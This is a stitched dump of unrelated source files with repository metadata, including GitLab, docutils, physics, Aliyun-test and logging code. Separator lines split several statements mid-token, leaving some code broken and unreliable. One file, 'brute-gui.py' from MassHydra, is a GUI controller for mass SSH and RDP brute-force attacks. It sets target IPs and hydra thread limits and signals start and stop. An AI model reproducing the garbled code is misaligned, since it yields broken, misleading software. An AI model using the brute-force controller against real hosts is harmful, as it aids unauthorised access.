validate_certs = module.params['validate_certs']
login_user = module.params['login_user']
login_password = module.params['login_password']
login_token = module.params['login_token']
group_name = module.params['name']
group_path = module.params['path']
description = module.params['description']
state = module.params['state']
try:
git = gitlab.Gitlab(url=server_url, ssl_verify=validate_certs, email=login_user, password=login_password,
private_token=login_token, api_version=4)
git.auth()
except (gitlab.exceptions.GitlabAuthenticationError, gitlab.exceptions.GitlabGetError) as e:
module.fail_json(msg='Failed to connect to Gitlab server: %s' % to_native(e))
if group_path is None:
group_path = group_name.replace(" ", "_")
group = GitLabGroup(module, git)
group_exists = group.existsGroup(group_name)
if group_exists and state == "absent":
if group.deleteGroup():
module.exit_json(changed=True, result="Successfully deleted group %s" % group_name)
else:
if state == "absent":
module.exit_json(changed=False, result="Group deleted or does not exists")
else:
if group.createOrUpdateGroup(name=group_name, path=group_path, description=description):
module.exit_json(changed=True, result="Successfully created or updated the group %s" % group_name)
else:
module.exit_json(changed=False, result="No need to update the group %s" % group_name)
if __name__ == '__main__':
main()
|
satiros12/MassHydra
|
brute-gui.py
|
Python
|
mit
| 4,425
| 0.011299
|
import sys, psutil, subprocess, time
from PyQt4 import QtGui
global config
def kill(proc_pid):
try:
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
except Exception as e:
print "Can't kill process",proc_pid,e
def parseConfig():
global config
class Config(object):
pass
config = Config()
try:
with open("./config.py","r") as CR:
L = CR.readlines()
LL = filter(lambda x : x != "\n" and x[0] != "#", L)
LLL = map(lambda x : x.split("#")[0].split("\n")[0] , LL)
LLL = map(lambda x: x[:-1] if x[-1] == "\r" else x , LLL)
DL = dict([[l.split("=")[0],
("=".join(l.split("=")[1:])).split("\"")[1] if "\"" in ("=".join(l.split("=")[1:])) else ("=".join(l.split("=")[1:]))] for
l in LLL])
config.__dict__ = DL
except Exception as e:
print "[ERROR] Configurations parese incorrect"
return False
return True
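# Hedged illustration of the key="value" lines parseConfig() expects in ./config.py
# (key names are inferred from the fields read by the GUI below; values are placeholders):
#   control_updateTime="2"
#   ID_server="192.168.1.10"
#   hydra_thread_limit="16"
#   server_control="./server_control"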
class BruteGui(QtGui.QMainWindow):
def __init__(self):
super(BruteGui, self).__init__()
self.initUI()
self.id_server = "./id_server.exe"
self.id_process = None
def initUI(self):
#Layout
widget = QtGui.QWidget(self)
grid = QtGui.QGridLayout()
grid.setSpacing(10)
#Buttons
controlButtons = ["Load","Id","Start","Stop","Log"]
self.Buttons = []
for ib,cb in zip(range(len(controlButtons)),controlButtons):
self.Buttons.append(QtGui.QPushButton(cb))
self.Buttons[-1].clicked.connect(self.buttonPushed)
#if cb == "Log":
# self.Buttons[-1].setCheckable(True)
grid.addWidget(self.Buttons[-1],ib,3)
#Lines
inputLines = ["REFRESH:","ID IP:","HTTP IP:","FTP IP:","FTP USER:","FTP PASS:","FTP DIRECTORY:","SSH OPTS:","RDP OPTS:","MAX THREADS:"]
inputLinesV = ["control_updateTime", "ID_server", "server", "ftp_ip", "ftp_user", "ftp_pass",
"ftp_dir", "service_ssh", "service_rdp", "hydra_thread_limit"]
self.LableLines = []
for ib, cb, vcb in zip(range(len(inputLines)), inputLines, inputLinesV):
QLE = QtGui.QLineEdit()
QLE.setText(config.__dict__[vcb])
self.LableLines.append([vcb,(QtGui.QLabel(cb),QLE)])
grid.addWidget(self.LableLines[-1][1][0], ib,0)
grid.addWidget(self.LableLines[-1][1][1], ib,1)
self.LableLines = dict(self.LableLines)
widget.setLayout(grid)
self.setCentralWidget(widget)
self.statusBar()
self.setGeometry(500, 500, 500, 300)
self.setWindowTitle('Brute Massive Force : SSH+RDP ')
self.show()
def buttonPushed(self):
global config
sender = self.sender()
ts = sender.text()
#["Load", "Id", "Start", "Stop", "Log"]
if(ts == "Load"):
for l in self.LableLines:
config.__dict__[l] = str(self.LableLines[l][1].text())
with open("./config.py","w") as WF:
for c in config.__dict__:
WF.write(str(c) + "=\"" + config.__dict__[c] + "\"\n")
with open(config.server_control, "w") as WF:
WF.write("load")
elif(ts== "Id"):
if self.id_process != None:
kill(self.id_process.pid)
self.id_process = subprocess.Popen([self.id_server])
with open(config.server_control, "w") as WF:
WF.write("id")
elif(ts == "Start"):
with ope
|
n(config.server_control, "w") as WF:
WF.write("start")
elif(ts == "Stop"):
with open(config.server_control, "w") as WF:
WF.write("stop")
|
elif (ts == "Log"):
with open(config.server_control, "w") as WF:
WF.write("log")
time.sleep(float(config.control_updateTime))
self.statusBar().showMessage(sender.text())
def closeEvent(self, event):
if self.id_process != None:
kill(self.id_process.pid)
def main():
parseConfig()
#t_id_server = threading.Thread(target=id_server)
app = QtGui.QApplication(sys.argv)
ex = BruteGui()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
steveandroulakis/mytardis
|
tardis/tardis_portal/publish/publishservice.py
|
Python
|
bsd-3-clause
| 2,367
| 0.008872
|
class PublishService():
def __init__(self, providers, experiment):
self.rc_providers = providers
self.experiment = experiment
self.provider = self._get_provider()
def _get_provider(self):
from tardis.tardis_portal.publish.provider.rifcsprovider import RifCsProvider
if self.rc_providers:
from django.utils.importlib import import_module
for pmodule in self.rc_providers:
# Import the module
try:
|
module_name, klass_name = pmodule.rsplit('.', 1)
module = import_module(module_name)
except ImportError, e:
# TODO Show appropriate error msg
raise e
|
# Create the Instance
try:
provider_class = getattr(module, klass_name)
provider = provider_class()
except AttributeError, e:
# TODO Show appropriate error msg
raise e
# Retrieve the provider that can deal with the experiment
if provider and provider.is_schema_valid(self.experiment):
return provider
# Can't find a matching provider, return a default one
return RifCsProvider()
def get_context(self):
return self.provider.get_rifcs_context(self.experiment)
def manage_rifcs(self, oaipath):
if self.provider.can_publish(self.experiment):
self._write_rifcs_to_oai_dir(oaipath)
else:
self._remove_rifcs_from_oai_dir(oaipath)
def _remove_rifcs_from_oai_dir(self, oaipath):
import os
filename = os.path.join(oaipath, "MyTARDIS-%s.xml" % self.experiment.id)
if os.path.exists(filename):
os.remove(filename)
def _write_rifcs_to_oai_dir(self, oaipath):
from tardis.tardis_portal.xmlwriter import XMLWriter
xmlwriter = XMLWriter()
xmlwriter.write_template_to_dir(oaipath, "MyTARDIS-%s.xml" % self.experiment.id,
self.get_template(), self.get_context())
def get_template(self):
return self.provider.get_template(self.experiment)
|
katakumpo/nicepy
|
nicepy/__init__.py
|
Python
|
mit
| 122
| 0
|
from nicepy.assertions import *
from nicepy.decorators import *
from ni
|
cepy.shortcuts import *
from n
|
icepy.utils import *
|
coddingtonbear/python-myfitnesspal
|
myfitnesspal/__init__.py
|
Python
|
mit
| 128
| 0
|
from myfitnesspal.client import Client # noqa
__version__ = "1.16.6"
VERSIO
|
N = tuple(int(v) for v in __version__.split("
|
."))
|
idea4bsd/idea4bsd
|
python/helpers/py3only/docutils/parsers/rst/languages/fi.py
|
Python
|
apache-2.0
| 3,541
| 0.001412
|
# -*- coding: utf-8 -*-
# $Id: fi.py 7119 2011-09-02 13:00:23Z milde $
# Author: Asko Soukka <asko.soukka@iki.fi>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/language
|
s.
"""
Finnish-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
'huomio': 'attention',
'varo': 'caution',
'code (translation required)': 'code',
'vaara': 'danger',
|
'virhe': 'error',
'vihje': 'hint',
't\u00e4rke\u00e4\u00e4': 'important',
'huomautus': 'note',
'neuvo': 'tip',
'varoitus': 'warning',
'kehotus': 'admonition',
'sivupalkki': 'sidebar',
'aihe': 'topic',
'rivi': 'line-block',
'tasalevyinen': 'parsed-literal',
'ohje': 'rubric',
'epigraafi': 'epigraph',
'kohokohdat': 'highlights',
'lainaus': 'pull-quote',
'taulukko': 'table',
'csv-taulukko': 'csv-table',
'list-table (translation required)': 'list-table',
'compound (translation required)': 'compound',
'container (translation required)': 'container',
#u'kysymykset': u'questions',
'meta': 'meta',
'math (translation required)': 'math',
#u'kuvakartta': u'imagemap',
'kuva': 'image',
'kaavio': 'figure',
'sis\u00e4llyt\u00e4': 'include',
'raaka': 'raw',
'korvaa': 'replace',
'unicode': 'unicode',
'p\u00e4iv\u00e4ys': 'date',
'luokka': 'class',
'rooli': 'role',
'default-role (translation required)': 'default-role',
'title (translation required)': 'title',
'sis\u00e4llys': 'contents',
'kappale': 'sectnum',
'header (translation required)': 'header',
'footer (translation required)': 'footer',
#u'alaviitteet': u'footnotes',
#u'viitaukset': u'citations',
'target-notes (translation required)': 'target-notes'}
"""Finnish name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
'lyhennys': 'abbreviation',
'akronyymi': 'acronym',
'kirjainsana': 'acronym',
'code (translation required)': 'code',
'hakemisto': 'index',
'luettelo': 'index',
'alaindeksi': 'subscript',
'indeksi': 'subscript',
'yl\u00e4indeksi': 'superscript',
'title-reference (translation required)': 'title-reference',
'title (translation required)': 'title-reference',
'pep-reference (translation required)': 'pep-reference',
'rfc-reference (translation required)': 'rfc-reference',
'korostus': 'emphasis',
'vahvistus': 'strong',
'tasalevyinen': 'literal',
'math (translation required)': 'math',
'named-reference (translation required)': 'named-reference',
'anonymous-reference (translation required)': 'anonymous-reference',
'footnote-reference (translation required)': 'footnote-reference',
'citation-reference (translation required)': 'citation-reference',
'substitution-reference (translation required)': 'substitution-reference',
'kohde': 'target',
'uri-reference (translation required)': 'uri-reference',
'raw (translation required)': 'raw',}
"""Mapping of Finnish role names to canonical role names for interpreted text.
"""
|
aestrivex/bctpy
|
test/nbs_test.py
|
Python
|
gpl-3.0
| 779
| 0.001284
|
from .load_samples import load_sample_group_dsi, load_sample_group
|
_fmri, load_sample_group_qball
import numpy as np
import bct
def test_nbs_dsi_qbi():
q = load_sample_group_qball()
d = load_sample_group_dsi()
_nbs_helper(q, d, .5, atol=0.3)
def test_nbs_paired_dsi_qbi():
pass
def test_nbs_dsi_fmri():
d = load_sample_group_dsi()
f = load_sample_group_fmri()
assert f.shape == (219, 219, 8)
_nbs_helper(d, f, .03, atol=0.03)
def test_nbs_paired_dsi_fmri():
pass
def _nbs_helper(x, y, expected_pval, ato
|
l=.05, thresh=.1, ntrials=25,
paired=False):
# comment
pval, _, _ = bct.nbs_bct(x, y, thresh, k=ntrials, paired=paired)
print(pval, expected_pval)
assert np.allclose(pval, expected_pval, atol=atol)
|
CDSP/generate_zips
|
generate_zips.py
|
Python
|
gpl-3.0
| 5,314
| 0.026177
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Execution example : python generate_zips.py "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"
#
# Libs
#
import csv, logging, os, sys, zipfile, zlib
#
# Config
#
log_folder = 'log'
log_level = logging.DEBUG
ignored_extensions = ['jp2', 'j2k', 'jpf', 'jpx', 'jpm', 'mj2']
ignored_files = ['.DS_Store']
#
# Functions
#
# A file is a classification plan file if its name is "planclassement.pdf"
def is_classification_file(file) :
return file == 'planclassement.pdf'
# A file is a transcription file if its name contains "_transcr_"
def is_transcr_file(file) :
return any(x in file for x in ['_transcr_', '_trans_'])
# A file is an inventory if its file name contains "_add_archives_inventaire"
def is_inventory_file(file) :
return '_add_archives_inventaire' in file
# A file is an "enquête sur l'enquête" file if it is into folder "add/ese" and its extension is ".mp3", ".xml" or ".pdf"
def is_ese_file(root, extension) :
return os.path.join('add', 'ese') in root and extension.lower() in ['mp3', 'xml', 'pdf']
# A file is a meta file if its name is "meta_documents.csv" or "meta_speakers.csv"
def is_meta_file(file) :
return file in ['meta_documents.csv', 'meta_speakers.csv']
def add_file_to_archive(zf, root, path, file) :
zf.write(os.path.join(root, file), os.path.join(root.replace(path, ''), file))
def zipdir(path, zf_ol, zf_dl) :
# zf_ol and zf_dl are zipfile handle
for root, dirs, files in os.walk(path) :
for file in files :
logging.info('Add file into archive folder : ' + os.path.join(root, file))
extension = file.split('.')[-1]
file_without_extension = file.split('.')[0]
# Ignore all the JPEG2000 files
if not extension in ignored_extensions and not file in ignored_files :
# Transcription file
if is_transcr_file(file) :
# Add ODT and PDF transcription files into "download" archive folder
if extension.lower() in ['odt', 'pdf'] :
add_file_to_archive(zf_dl, root, path, file)
# Add XML transcription files into "online" archive folder
elif extension.lower() in ['xml'] :
add_file_to_archive(zf_ol, root, path, file)
# If file is an inventory, classification or "enquête sur l'enquête", add it to "donwload" and "online" archive folder
elif is_inventory_file(file) or is_classification_file(file) or is_ese_file(root, extension) :
add_file_to_archive(zf_dl, root, path, file)
add_file_to_archive(zf_ol, root, path, file)
# If file is a meta file, add it to "online" archive folder
elif is_meta_file(file) :
add_file_to_archive(zf_ol, root, path, file)
# For other files, check into the inventory file
elif file_without_extension in recordsbyid.keys() :
if recordsbyid[file_without_extension][21] != '' :
add_file_to_archive(zf_dl, root, path, file)
if recordsbyid[file_without_extension][22] != '' :
add_file_to_archive(zf_ol, root, path, file)
# Else do nothing
else :
logging.info('#ignored : file not added into "online" archive folder neither into "download" archive folder : ' + file)
#
# Main
#
if __name__ == '__main__' :
if len(sys.argv) <= 3 :
print ''
print 'Arguments error'
print 'Correct usage : python ' + sys.argv[0] + ' "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"'
print 'The first argument is mandatory and is the path to the folder to zip'
print 'The second argument is mandatory and is the path to the CSV inventory file'
print 'The third argument is not mandatory and is the name of the survey, this is used to name the archive folders'
else :
# Check that log folder exists, else create it
if not os.path.exists(log_folder) :
os.makedirs(log_folder)
# Create the archive folders names
survey_name = sys.argv[3] if len(sys.argv) == 4 else 'survey'
zip_online_folder_name = survey_name + '-ol.zip'
zip_download_folder_name = survey_name + '-dl.zip'
# Create log file
# log_file = log_folder +
|
path_separator + sys.argv[0].replace('.py', '.log')
log_file = os.path.join(log_folder, sys.argv[0].replace('.py', '.log'))
logging.basicConfig(filename = log_file, filemode = 'w', format = '%(asctime)s | %(levelname)s | %(message)s', datefmt = '%m/%d/%Y %I:%M:%S %p', level = log_level)
logging.info('Start')
# Parse inventory file
logging.info('Parse inventory file')
inventory_file = sys.argv[2]
rec
|
ordsbyid = {}
with open(inventory_file, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for x in spamreader :
if len(x) == 23 :
recordsbyid[x[1]] = x
# Create archive folder
zf_ol = zipfile.ZipFile(zip_online_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
zf_dl = zipfile.ZipFile(zip_download_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
logging.info('Create archive folders')
# Add files into archive folder
zipdir(sys.argv[1], zf_ol, zf_dl)
logging.info('Online folder zipped into file : ' + zip_online_folder_name)
logging.info('Download folder zipped into file : ' + zip_download_folder_name)
print ''
print 'Online folder zipped into file : ' + zip_online_folder_name
print 'Download folder zipped into file : ' + zip_download_folder_name
zf_ol.close()
zf_dl.close()
|
DxCx/nzbToMedia
|
nzbToGamez.py
|
Python
|
gpl-3.0
| 2,702
| 0.011843
|
#!/usr/bin/env python2
#
##############################################################################
### NZBGET POST-PROCESSING SCRIPT ###
# Post-Process to CouchPotato, SickBeard, NzbDrone, Mylar, Gamez, HeadPhones.
#
# This script sends the download to your automated media management servers.
#
# NOTE: This script requires Python to be installed on your system.
##############################################################################
#
### OPTIONS ###
## General
# Auto Update nzbToMedia (0, 1).
#
# Set to 1 if you want nzbToMedia to automatically check for and update to the latest version
#auto_update=0
# Safe Mode protection of DestDir (0, 1).
#
# Enable/Disable a safety check to ensure we don't process all downloads in the default_downloadDirectory by mistake.
#safe_mode=1
## Gamez
# Gamez script category.
#
# category that gets called for post-processing with Gamez.
#gzCategory=games
# Gamez api key.
#gzapikey=
# Gamez host.
#
# The ipaddress for your Gamez server. e.g For the Same system use localhost or 127.0.0.1
#gzhost=localhost
# Gamez port.
#gzport=8085
# Gamez uses ssl (0, 1).
#
# Set to 1 if using ssl, else set to 0.
#gzssl=0
# Gamez library
#
# move downloaded games here.
#gzlibrary
# Gamez web_root
#
# set this if using a reverse proxy.
#gzweb_root=
# Gamez watch directory.
#
# set this to where your Gamez completed downloads are.
#gzwatch_dir=
## Posix
# Niceness for external tasks Extractor and Transcoder.
#
# Set the Niceness value for the nice command. These range from -20 (most favorable to the process) to 19 (least favorable to the process).
#niceness=10
# ionice scheduling class (0, 1
|
, 2, 3).
#
# Set the ionice scheduling class. 0 for none, 1 for real time, 2 for best-effort, 3 for idle.
#ionice_class=2
# ionice scheduling class data.
#
# Set the ionice scheduling class data. This defines the class data, if the class accepts an argument. For real time and best-effort, 0-7 is valid data.
#ionice_classdata=4
## WakeOnLan
# use WOL (0, 1).
#
# set to 1 to send WOL broadcast to the mac and test the server (e.g. xbmc) on the host and port specified.
#wolwake=0
# WO
|
L MAC
#
# enter the mac address of the system to be woken.
#wolmac=00:01:2e:2D:64:e1
# Set the Host and Port of a server to verify system has woken.
#wolhost=192.168.1.37
#wolport=80
### NZBGET POST-PROCESSING SCRIPT ###
##############################################################################
import sys
import nzbToMedia
section = "Gamez"
result = nzbToMedia.main(sys.argv, section)
sys.exit(result)
|
gregvw/EPM-FCC-bulk
|
epm.py
|
Python
|
mit
| 4,240
| 0.020755
|
from __future__ import division
import itertools as it
import numpy as np
import scipy.linalg as sl
import matplotlib.pyplot as plt
import csv
import sys
from zdict import zdict
# hbar^2/2m in eV-Ang^2
hb2m0 = 3.807
# hcR_infty (eV per Rydberg)
Ry = 13.60569253
def mag2(V):
""" Return the magnitude squared of a tuple, list, or array """
return sum([v**2 for v in V])
class EPM(object):
def __init__(self,m,a0,VS,VA,bands):
self.a0 = a0
self.bands = bands
# Range of Fourier modes
d = range(-m,1+m)
# Construct all G-vectors in reciprocal lattice basis
G = [np.array((-i+j+k,i-j+k,i+j-k)) for i in d for j in d for k in d]
# Restrict to vectors of squared magnitude 12 or less
self.G = [g for g in G if mag2(g) < 13]
# Number of G vectors
ng = len(self.G)
# Assemble potential part of Hamiltonian
self.H = np.zeros((ng,ng),dtype=complex)
# Loop over all pairs of G vectors
for ii in range(ng):
for jj in range(ii,ng):
# Difference between two G vectors
dg = self.G[jj]-self.G[ii]
dgmag2 = mag2(dg)
# Dot product of dg and tau
theta = np.pi*sum(dg)/4
c = np.cos(theta)
s = np.sin(theta)
self.H[ii,jj] = (VS[dgmag2]*c-1j*VA[dgmag2]*s)*Ry
self.H[jj,ii] = self.H[ii,jj].conj()
def solve(self,k):
# Incorporate kinetic (main diagonal) part of Hamiltonian
kpg2 = np.array([mag2(k-g) for g in self.G])
kinetic = hb2m0*kpg2*(2*np.pi/self.a0)**2
# Insert diagonal elements
np.fill_diagonal(self.H,kinetic)
# Calculate eigenvalues of a Hermitian matrix
E = sl.eigvalsh(self.H)[:self.bands]
return E
if __name__ == '__main__':
# Name of semiconductor, e.g. Si, GaAs, InP, ZnS...
material = sys.argv[1]
reader = csv.reader(
|
open('form_factors.csv','r'),delimiter=',')
param = [[entry.split()[0] for entry in row] for row in reader]
# Store form factors in dictionaries
VS = zdict()
VA = zdict()
a0 = None
# Read form factors and lattice constant from file
row = [p[0] for p in param].index(material)
for i in range(1,len(param[0])):
exec(param[0][i] + '=' + param[row][i])
# Symmetry points in the FCC/Zincblende Brillouin zone
|
bz = {r'$\Gamma$':np.array((0,0,0)),
r'X':np.array((0,1,0)),
r'L':np.array((1/2,1/2,1/2)),
r'W':np.array((1/2,1,0)),
r'U':np.array((1/4,1,1/2)),
r'K':np.array((3/4,3/4,0))}
# Follow this path through the Brillouin zone to construct
# the band diagram
path = [r'L',r'$\Gamma$',r'X',r'W',r'K',r'$\Gamma$']
path_dex = range(len(path)-1)
# Highest Fourier mode to use
fmodes = 3
# Number of energy bands to compute
bands = 8
# Number of k-point along each path to evaluate
kpts = 40
# k-space path parametric variable
t = np.linspace(0,1,kpts)
# Construct solver object
epm = EPM(fmodes,a0,VS,VA,bands)
# Sequence of path directions in k-space
kdir = np.diff(np.vstack([bz[p] for p in path]),n=1,axis=0)
# Lengths of k-space path segments
path_length = [np.sqrt(mag2(k)) for k in kdir]
# Relative positions of k-space symmetry points along x axis
xticks = np.cumsum([0]+path_length)
x=np.hstack([xticks[i]*(1-t)+xticks[i+1]*t for i in path_dex])
# Parameterize path between two Brilluoin zone symmetry points
K = lambda d: (np.outer((1-t),bz[path[d]])+np.outer(t,bz[path[d+1]]))
# Compute eigenvalues along k-space path
E = np.vstack([np.vstack([epm.solve(k) for k in K(j)]) for j in path_dex])
Emin = np.min(E)-1
Emax = np.max(E)+1
# Display E-k diagram
fig = plt.figure(1,(10,6))
plt.plot(x,E,'r-',lw=2)
plt.xlim(x[0],x[-1])
plt.ylim(Emin,Emax)
plt.xticks(xticks,path,fontsize=20)
plt.ylabel('Energy (eV)',fontsize=20)
plt.title(material + ' bandstructure by EPM without S-O')
plt.vlines(xticks,Emin,Emax)
plt.show()
|
airbnb/streamalert
|
tests/unit/streamalert/apps/test_apps/test_aliyun.py
|
Python
|
apache-2.0
| 7,474
| 0.002141
|
"""
Copyright 2018-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import os
from mock import patch
from moto import mock_ssm
from nose.tools import assert_count_equal, assert_equal, assert_false, assert_true, raises
from aliyunsdkcore.acs_exception.exceptions import ServerException
from streamalert.apps._apps.aliyun import AliyunApp
from tests.unit.streamalert.apps.test_helpers import get_event, put_mock_params
from tests.unit.streamalert.shared.test_config import get_mock_lambda_context
@mock_ssm
class TestAliyunApp:
"""Test class for the AliyunApp"""
# pylint: disable=protected-access
@patch.dict(os.environ, {'AWS_DEFAULT_REGION': 'us-east-1'})
def setup(self):
"""Setup before each method"""
# pylint: disable=attribute-defined-outside-init
self._test_app_name = 'aliyun'
put_mock_params(self._test_app_name)
self._event = get_event(self._test_app_name)
self._context = get_mock_lambda_context(self._test_app_name, milliseconds=100000)
self._app = AliyunApp(self._event, self._context)
def test_sleep_seconds(self):
"""AliyunApp - Sleep Seconds"""
assert_equal(0, self._app._sleep_seconds())
def test_date_formatter(self):
"""AliyunApp - Date Formatter"""
assert_equal(self._app.date_formatter(), '%Y-%m-%dT%H:%M:%SZ')
def test_required_auth_info(self):
"""AliyunApp - Required Auth Info"""
assert_count_equal(list(self._app.required_auth_info().keys()),
{'access_key_id', 'access_key_secret', 'region_id'})
def test_region_validator_success(self):
"""AliyunApp - Region Validation, Success"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast-1'), 'ap-northeast-1')
def test_region_validator_failure(self):
"""AliyunApp - Region Validation, Failure"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast'), False)
@raises(ServerException)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
@patch('logging.Logger.exception')
def test_server_exception(self, log_mock, client_mock):
"""AliyunApp - Gather Logs, Exception"""
client_mock.side_effect = ServerException("error", "bad server response")
self._app._gather_logs()
log_mock.assert_called_with("%s error occurred", "Server")
def test_gather_logs_last_timestamp_set(self):
"""AliyunApp - Request Creation"""
assert_equal(self._app.request.get_StartTime(), '2018-07-23T15:42:11Z')
assert_equal(self._app.request.get_MaxResults(), AliyunApp._MAX_RESULTS)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_no_more_entries(self, client_mock):
"""AliyunApp - Gather Logs with no entries"""
client_mock.return_value = '{"RequestId":"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[],"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(0, len(logs))
assert_false(self._app._more_to_poll)
assert_equal("2018-07-23T19:28:00Z", self._app._last_timestamp)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_entries(self, client_mock):
"""AliyunApp - Gather Logs with some entries"""
client_mock.return_value = '{"NextToken":"20","RequestId":'\
'"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[{"eventTime":"123"},{"eventTime":"123"}],' \
'"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(2, len(logs))
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "20")
@patch('streamalert.apps.app_base.AppIntegration._invoke_successive_app')
@patch('streamalert.apps.batcher.Batcher._send_logs_to_lambda')
@patch('streamalert.apps._apps.aliyun.AliyunApp._sleep_seconds')
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_last_timestamp(self, client_mock, sleep_mock, batcher_mock, _):
"""AliyunApp - Test last_timestamp"""
# mock 3 responses
mock_resps = [
{
'NextToken': '50',
'RequestId': 'AAAAAAAA',
'Events': [
{
'eventTime': '2018-06-23T19:29:00Z'
},
{
'eventTime': '2018-06-23T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-2
|
3T19:28:30Z'
},
{
'NextTo
|
ken': '100',
'RequestId': 'BBBBBBBBB',
'Events': [
{
'eventTime': '2018-06-24T19:29:00Z'
},
{
'eventTime': '2018-06-24T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
},
{
'NextToken': '150',
'RequestId': 'CCCCCCCC',
'Events': [
{
'eventTime': '2018-06-25T19:29:00Z'
},
{
'eventTime': '2018-06-25T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
}
]
client_mock.side_effect = [json.dumps(r, separators=(',', ':')) for r in mock_resps]
        # Mock remaining time. The _sleep_seconds() method will be called twice for
        # each call to gather logs via the Aliyun API. Set the sleep seconds to a large
        # number to mimic the corner case where there are still more logs to pull when
        # the Lambda function timeout is reached. In this case, the _last_timestamp
        # should still be updated correctly.
sleep_mock.side_effect = [0, 0, 0, 0, 1000000, 0]
        # Mock 3 batcher calls to invoke the successive Lambda function since there are more logs
batcher_mock.side_effect = [True, True, True]
self._app.gather()
assert_equal(self._app._poll_count, 3)
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "150")
assert_equal(self._app._last_timestamp, '2018-07-23T19:28:00Z')
|
mven/gonzo.py
|
gonzo.py
|
Python
|
mit
| 888
| 0.023649
|
# GONZO: A PYTHON SCRIPT TO RECORD PHP ERRORS INTO MONGO
# Michael Vendivel - vendivel@gmail.com
import subprocess
import datetime
from pymongo import MongoClient
# where's the log file
filename = '/path/to/php/logs.log'
# set up mongo client
client = MongoClient('mongo.server.address', 27017)
# w
|
hich DB
db = client.logs
# which Collection
php_logs = db.php_logs
# open a subprocess to tail (and follow) the log file
f = subprocess.Popen(['tail','-f',filename],\
stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# continue to read the file and record lines into mongo
while True:
# read line by line
line = f.stdout.readline()
# compose the document to be inserted
post = {"line": line,
"created": datetime.datetime.utcnow()
}
|
# insert the document into the Collection
post_id = php_logs.insert(post)
# output the line for visual debugging (optional)
print line
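# The loop above uses the legacy Collection.insert() call; PyMongo 3.x and later
# deprecate it in favour of insert_one(). The helper below is only a sketch of
# the same write with the newer API, reusing the `php_logs` collection defined
# above; it is never reached because the tail loop never exits.
def record_line(log_line):
    """Insert one log line with a UTC timestamp and return its ObjectId."""
    doc = {"line": log_line, "created": datetime.datetime.utcnow()}
    return php_logs.insert_one(doc).inserted_id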
|
Vito2015/pyextend
|
pyextend/core/thread/multiprocessTask.py
|
Python
|
gpl-2.0
| 6,887
| 0.001452
|
#!/usr/bin/env python
# coding: utf-8
"""
multiprocessTask.py
~~~~~~~~~~~~~~~~~~~
a multiprocess model of producer/consumer
task = Task(work_func, 1, 3, counter=0, a='', callback=cb)
results
|
= task.run()
for i in xrange(26):
lines = ["%d" % i] * random.randint(10, 20)
task.put(lines)
task.finish()
"""
import os
impor
|
t time
from multiprocessing import Pool as ProcessPool, Manager, cpu_count
__all__ = ['Producer', 'Consumer', 'Task']
class Callable(object):
def __call__(self, *args, **kwargs):
raise NotImplementedError('%s not callable' % self)
def run(self, *args, **kwargs):
raise NotImplementedError('%s.run() not implemented' % self)
class Producer(Callable):
def __init__(self, todo_list=None, max_qsize=None):
manager = Manager()
self._q = manager.Queue()
self._q_lock = manager.Lock()
self._q_close_event = manager.Event()
self._max_qsize = max_qsize or 0
todo_list = todo_list or []
if isinstance(todo_list, (list, tuple)) and len(todo_list) > 0:
self.put(todo_list)
super(Producer, self).__init__()
@property
def q_size(self):
return self._q.qsize()
def __call__(self, q, lock, close_event, *args, **kwargs):
for i, data in enumerate(self.run()):
with lock:
q.put(data)
print 'pid %s put %d: %s' % (os.getpid(), i, data)
def run(self):
while 1:
with self._q_lock:
if self._q.empty():
if self._q_close_event.is_set():
break
else:
time.sleep(0.01)
continue
yield self._q.get()
def put(self, *todos):
for todo in todos:
with self._q_lock:
self._q.put(todo)
def finish(self):
try:
self._q_close_event.set()
except Exception as e:
print e
class Consumer(Callable):
def __init__(self, fn=None):
self._fn = fn
self.results = []
super(Consumer, self).__init__()
def __call__(self, q, lock, close_event, *args, **kwargs):
while 1:
with lock:
if q.empty():
if close_event.is_set():
break
else:
time.sleep(0.01)
continue
data = q.get()
self.results.append(self.run(data, *args, **kwargs))
return self.results
